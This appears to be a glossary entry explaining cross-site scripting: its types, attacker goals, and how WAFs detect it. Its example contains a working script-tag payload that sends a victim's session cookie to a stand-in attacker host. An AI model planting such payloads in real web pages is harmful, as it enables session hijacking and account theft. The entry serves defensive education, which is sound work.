Cross-Site Scripting (XSS)
Quick Definition
A vulnerability that allows attackers to inject malicious client-side scripts into web pages viewed by other users.
What is Cross-Site Scripting?
Cross-Site Scripting (XSS) is a client-side code injection attack where an attacker can execute malicious scripts in a victim's browser. XSS occurs when a web application includes untrusted data in a web page without proper validation or escaping.
XSS attacks can be used to:
- Steal session cookies and hijack user accounts
- Redirect users to malicious websites
- Deface web pages
- Log keystrokes and capture sensitive data
- Spread malware
There are three main types of XSS:
- Stored XSS: Malicious script is permanently stored on the target server (in a database, comment field, etc.)
- Reflected XSS: Malicious script is embedded in a URL and reflected off the web server in error messages or search results
- DOM-based XSS: The vulnerability exists in client-side JavaScript rather than server-side code
Examples
A comment form that displays user input without escaping:
<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>When other users view the page with this comment, their session cookies are sent to the attacker's server.
Frequently Asked Questions
How do WAFs detect XSS attacks?
WAFs detect XSS by scanning HTTP requests for malicious JavaScript patterns, HTML tags, and event handlers. They look for script tags, javascript URLs, event attributes like onload/onerror, and encoded variations of these patterns.